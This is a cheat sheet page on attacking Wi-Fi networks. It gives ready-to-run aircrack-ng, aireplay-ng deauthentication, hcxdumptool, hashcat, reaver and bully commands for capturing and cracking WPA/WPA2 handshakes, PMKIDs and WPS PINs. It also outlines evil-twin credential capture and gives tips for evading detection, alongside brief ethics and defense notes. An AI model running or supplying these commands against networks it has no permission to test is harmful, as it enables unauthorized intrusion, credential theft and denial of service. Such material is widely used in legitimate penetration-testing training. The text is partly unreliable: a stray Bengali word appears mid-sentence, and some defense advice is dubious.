Skip to main content

WiFi Hacking Cheatsheet

https://book.hacktricks.wiki/en/generic-methodologies-and-resources/pentesting-wifi/index.html

Core Concepts

  • 802.11: The IEEE standard for wireless local area networks (WLANs).
  • SSID (Service Set Identifier): The name of the wireless network.
  • BSSID (Basic Service Set Identifier): The MAC address of the wireless access point (AP).
  • Beacon Frames: Frames broadcast by APs to announce their presence and parameters.
  • Probe Requests: Frames sent by clients to discover available networks.
  • Probe Responses: Frames sent by APs in response to probe requests.
  • Authentication: The process of verifying the identity of a client.
  • Association: The process of a client joining a wireless network.
  • 4-Way Handshake: The process used to generate encryption keys in WPA/WPA2-PSK.
  • PMK (Pairwise Master Key): The master key used in WPA/WPA2-PSK, derived from the passphrase.
  • PTK (Pairwise Transient Key): The encryption key used for a specific session, derived from the PMK during the 4-way handshake.
  • MIC (Message Integrity Check): A cryptographic checksum used to verify the integrity of data.
  • Deauthentication Attack: Sending deauthentication frames to disconnect clients from an AP.
  • Monitor Mode: A special mode that allows a wireless adapter to capture all wireless traffic within range, not just traffic to or from its own MAC address.
  • Packet Injection: The ability to transmit arbitrary wireless packets.

Essential Tools

  • Aircrack-ng Suite:
    • airmon-ng: Manages wireless interface modes (monitor mode, managed mode).
    • airodump-ng: Captures wireless traffic and displays information about APs and clients.
    • aireplay-ng: Injects wireless packets (used for deauthentication attacks, etc.).
    • aircrack-ng: Cracks WPA/WPA2-PSK keys from captured handshakes.
    • packetforge-ng: Creates custom packets.
    • airdecap-ng: Decrypts WPA/WPA2 traffic.
  • Reaver: Automates WPS brute-force attacks.
  • Bully: Another WPS brute-force tool, considered faster and more feature-rich than Reaver in some cases.
  • Wireshark: A powerful network protocol analyzer used for examining captured traffic.
  • tshark: The command-line version of Wireshark.
  • hcxdumptool: A tool for capturing WPA/WPA2 authentication handshakes and PMKIDs.
  • hcxtools: A set of tools for converting and manipulating captured handshake data.
  • Hashcat: A fast and versatile password cracking tool that can be used to crack WPA/WPA2 keys (GPU acceleration recommended).
  • John the Ripper: Another popular password cracking tool that supports WPA/WPA2 cracking.

General Workflow for WPA/WPA2-PSK Cracking

  1. Information Gathering:
    • Identify Target Network: Use airodump-ng or a similar tool to discover the target network's SSID, BSSID, channel, and encryption type.
  2. Put Wireless Interface into Monitor Mode: 
    sudo airmon-ng check kill # Kill processes that might interfere
    sudo airmon-ng start wlan0
    # OR
    sudo iwconfig wlan0 mode monitor
    sudo ifconfig wlan0 up
    • Replace wlan0 with the name of your wireless interface. This often results in a new interface being created like wlan0mon or mon0. Use that interface going forward.
  3. Capture Wireless Traffic: 
    sudo airodump-ng -c <channel> --bssid <BSSID> -w <output_file> <interface>
    • -c <channel>: The channel the target AP is on.
    • --bssid <BSSID>: The MAC address of the target AP.
    • -w <output_file>: The prefix for the output files (capture file will be output_file-01.cap).
    • <interface>: Your wireless interface in monitor mode (e.g., wlan0mon).
  4. Capture the 4-Way Handshake:
    • Wait for a Client to Connect: You can wait for a legitimate client to connect to the target AP.
    • Deauthenticate a Client (Faster): Use aireplay-ng to send deauthentication packets to force a client to reconnect, capturing the handshake. 
      sudo aireplay-ng -0 2 -a <BSSID> -c <client_mac> <interface>
      • -0 2: Sends 2 deauthentication packets.
      • -a <BSSID>: The MAC address of the target AP.
      • -c <client_mac>: The MAC address of a client connected to the AP (you can see this in the airodump-ng output). If not specified, a broadcast deauthentication will be sent. It is less effective.
    • Monitor airodump-ng Output: Look for the message "WPA handshake: <BSSID>" in the top right corner, indicating a successful handshake capture.
  5. Stop the Capture: Press Ctrl+C in the airodump-ng terminal.
  6. Crack the Handshake:
    • Using aircrack-ng (CPU-based): 
      aircrack-ng <output_file>-01.cap -w <wordlist>
      • <output_file>-01.cap: The capture file containing the handshake.
      • -w <wordlist>: The path to your password wordlist.
    • Using hashcat (GPU-based, faster):
      1. Convert the capture file to a hashcat-compatible format (using hcxpcapngtool from hcxtools or cap2hccapx from the old hashcat-utils package):
        • hcxpcapngtool -o hash.hc22000 capture.cap
        • Or if you still have cap2hccapx: cap2hccapx capture.cap hash.hccapx
      2. Run hashcat: 
        hashcat -m 22000 hash.hc22000 <wordlist>
        • -m 22000: Specifies the hash mode for WPA/WPA2 (use the new 22000 format).
      3. If you have an old .hccapx file (less secure than .hc22000): 
        hashcat -m 2500 hash.hccapx <wordlist>

Cracking WPA/WPA2 with PMKID

  • PMKID (Pairwise Master Key Identifier): A value derived from the PMK that can be used to crack the WPA/WPA2 passphrase without needing the 4-way handshake.
  • Capturing the PMKID:
    • Use hcxdumptool: 
      sudo hcxdumptool -i <interface> -o capture.pcapng --enable_status=1
    • Send an association request to the AP. The target AP will respond with an EAPOL frame containing the PMKID.
      • -i: Interface
      • -o: Output file
      • --enable_status=1: Shows the status of the attack. 1 enables real-time output of PMKID captures.
  • Converting to Hashcat Format:
    • Use hcxpcapngtool from hcxtools: 
      hcxpcapngtool -o hash.hc22000 capture.pcapng
  • Cracking with Hashcat: 
    hashcat -m 22000 hash.hc22000 <wordlist>

WPS Attacks

  • WPS (Wi-Fi Protected Setup): A simplified setup process for wireless networks that is often vulnerable to brute-force attacks.
  • Reaver: 
    sudo reaver -i <interface> -b <BSSID> -c <channel> -vv -K 1
    • -i <interface>: Your wireless interface in monitor mode.
    • -b <BSSID>: The MAC address of the target AP.
    • -c <channel>: The channel the target AP is on.
    • -vv: Very verbose output.
    • -K 1: Use Pixie Dust attack in addition to the standard attack.
    • Note: Reaver can take a long time (hours or even days) to complete.
  • Bully: 
    sudo bully -b <BSSID> -c <channel> -B <interface>
    • -b <BSSID>: The MAC address of the target AP.
    • -c <channel>: The channel the target AP is on.
    • -B: Disables the aggressive brute-force mode, use with caution.
    • <interface>: Your wireless interface in monitor mode.
  • Pixie Dust Attack:
    • An offline WPS attack that exploits a দুর্বলতা in some APs' random number generation.
    • Use the -K option with reaver or the appropriate option in other tools.

Evil Twin Attacks

  • Concept: Creating a rogue AP with the same SSID as a legitimate network to trick clients into connecting to it.
  • Tools:
    • airbase-ng (part of Aircrack-ng)
    • hostapd
    • dnsmasq
    • Specialized tools like wifiphisher and wifipumpkin
  • Steps (Simplified):
    1. Create a rogue AP with the same SSID as the target network (and potentially the same BSSID if you can spoof it).
    2. Deauthenticate clients from the legitimate AP to encourage them to connect to the evil twin.
    3. Capture credentials or other sensitive information from clients that connect to the evil twin.
    4. Potentially forward traffic to the internet to avoid suspicion.
  • Defenses:
    • 802.11w (Protected Management Frames): Helps protect against deauthentication attacks.
    • VPNs: Encrypted all traffic, even on untrusted networks.
    • Certificate Pinning: Verify the certificate of the AP.

General Procedures and Best Practices

  • Planning and Reconnaissance:
    • Identify your target network(s).
    • Gather information about the target APs (SSID, BSSID, channel, encryption type, WPS status).
    • Use tools like airodump-ng, Kismet, or smartphone apps to passively scan for wireless networks.
  • Choosing the Right Attack:
    • WPA/WPA2-PSK: 4-way handshake capture and offline cracking or PMKID attack.
    • WPS: Brute-force attack with reaver or bully (if WPS is enabled and vulnerable).
    • Evil Twin: If the target network is open or uses weak encryption, or if you need to capture credentials directly.
  • Optimizing Cracking Speed:
    • GPU Acceleration: Use hashcat with a powerful GPU for faster cracking.
    • Good Wordlists: Use comprehensive and well-crafted wordlists.
    • Rules: Use rules with hashcat or John the Ripper to generate variations of passwords from the wordlist.
  • Ethical Considerations:
    • Always obtain explicit, written permission before conducting any wireless security testing.
    • Be aware of the legal implications of unauthorized access to wireless networks.
    • Report vulnerabilities responsibly to the network owner.
  • Staying Undetected:
    • MAC Address Spoofing: Change your MAC address to avoid being easily identified.
    • Low and Slow: Avoid aggressive scanning or brute-force attempts that could trigger alarms.
    • Don't Connect to the Target Network: If possible, avoid directly connecting to the target network during the attack.
  • Defending Against Wireless Attacks:
    • Strong Passphrases: Use long, complex, and unique passphrases for WPA/WPA2-PSK.
    • Disable WPS: Disable WPS if it's not absolutely necessary.
    • Enable WPA3: Use WPA3 if your devices support it, as it provides better security than WPA2.
    • MAC Filtering: While not foolproof, MAC filtering can add an extra layer of security.
    • Wireless Intrusion Detection System (WIDS): Monitor for suspicious wireless activity.
    • Client Isolation: Prevent wireless clients from communicating with each other.
    • Regular Security Audits: Periodically assess the security of your wireless network.
  • Using Virtual Machines: Perform Wi-Fi hacking activities within a virtual machine (VM) to isolate the testing environment from your host operating system. Ensure your wireless adapter is properly passed through to the VM.

Advanced Techniques

  • WPA/WPA2 Enterprise Attacks:
    • Targeting enterprise wireless networks that use 802.1X authentication (e.g., with a RADIUS server).
    • Techniques include capturing and cracking MSCHAPv2 handshakes, exploiting vulnerabilities in the authentication server, and setting up rogue authentication servers.
  • Rogue Access Point Attacks:
    • Deploying a rogue AP to capture user credentials or launch man-in-the-middle attacks.
  • Karma Attacks:
    • A type of rogue AP attack where the AP responds to probe requests from clients for any SSID, potentially tricking clients into connecting even if they haven't previously connected to that network.
  • Known Beacons Attack: An attack that can force a device to connect to a fake AP even if the device is configured to connect to a specific, known network.
  • 802.11 Protocol Exploitation:
    • Exploiting vulnerabilities in the 802.11 protocol itself, rather than just the encryption or authentication mechanisms.
  • Jamming:
    • Intentionally interfering with wireless signals to disrupt communications (denial-of-service).